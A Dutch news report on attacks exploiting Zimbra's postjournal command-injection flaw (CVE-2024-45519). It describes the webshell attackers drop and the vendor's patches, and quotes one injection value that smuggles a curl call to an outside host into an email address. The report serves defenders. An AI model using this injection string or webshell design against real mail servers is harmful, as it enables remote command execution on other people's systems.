Cybersecurity-onderzoekers waarschuwen voor actieve exploitatiepogingen gericht op een nieuw onthuld beveiligingslek in Synacor’s Zimbra Collaboration.
Enterprise-beveiligingsbedrijf Proofpoint zei dat het de activiteit begon te observeren vanaf 28 september 2024. De aanvallen zijn bedoeld om misbruik te maken van CVE-2024-45519, een ernstige beveiligingsfout in de postjournal-service van Zimbra die niet-geverifieerde aanvallers in staat zou kunnen stellen willekeurige opdrachten uit te voeren op getroffen installaties.
“De e-mails waarmee Gmail werd vervalst, werden naar valse adressen in de CC-velden gestuurd in een poging voor Zimbra-servers om ze te parseren en uit te voeren als commando’s”, zei Proofpoint in een reeks berichten op X. “De adressen bevatten Base64-strings die worden uitgevoerd met de sh-hulpprogramma.”
Het kritieke probleem is door Zimbra verholpen in versies 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9 en 10.1.1, uitgebracht op 4 september 2024. Een beveiligingsonderzoeker genaamd lebr0nli (Alan Li) heeft de ontdekking gedaan en het melden van de tekortkoming.
“Hoewel de postjournal-functie op de meeste systemen optioneel of niet ingeschakeld kan zijn, is het nog steeds nodig om de meegeleverde patch toe te passen om mogelijke exploitatie te voorkomen”, merkte Ashish Kataria, een beveiligingsarchitect bij Synacor, op in een commentaar op 19 september 2024.
“Voor Zimbra-systemen waarop de postjournal-functie niet is ingeschakeld en de patch niet onmiddellijk kan worden toegepast, kan het verwijderen van het postjournal-binaire bestand worden beschouwd als een tijdelijke maatregel totdat de patch kan worden toegepast.”
Proofpoint zei dat het een reeks CC-adressen heeft geïdentificeerd, die, wanneer ze worden gedecodeerd, proberen een webshell te schrijven op een kwetsbare Zimbra-server op de locatie: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp.”
De geïnstalleerde webshell luistert vervolgens naar een inkomende verbinding met een vooraf bepaald JSESSIONID Cookie-veld, en indien aanwezig, gaat het verder met het parseren van de JACTION-cookie voor Base64-opdrachten.
De webshell is uitgerust met ondersteuning voor het uitvoeren van opdrachten via exec. Als alternatief kan het ook een bestand downloaden en uitvoeren via een socketverbinding. Op het moment van schrijven zijn de aanvallen niet toegeschreven aan een bekende bedreigingsacteur of -groep.
Dat gezegd hebbende, lijkt de exploitatieactiviteit te zijn begonnen een dag nadat Project Discovery technische details van de fout had vrijgegeven, die zei dat deze “voortkomt uit het doorgeven van niet-opgeschoonde gebruikersinvoer aan popen in de niet-gepatchte versie, waardoor aanvallers willekeurige commando’s kunnen injecteren.”
Het cyberbeveiligingsbedrijf zei dat het probleem zijn oorsprong vindt in de manier waarop het op C gebaseerde postjournal binaire bestand de e-mailadressen van ontvangers verwerkt en parseert in een functie genaamd “msg_handler(),”, waardoor opdrachtinjectie mogelijk wordt gemaakt op de service die op poort 10027 draait bij het doorgeven van een speciaal vervaardigde SMTP bericht met een vals adres (bijvoorbeeld “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
In het licht van actieve exploitatiepogingen wordt gebruikers ten zeerste aangeraden de nieuwste patches toe te passen voor optimale bescherming tegen potentiële bedreigingen.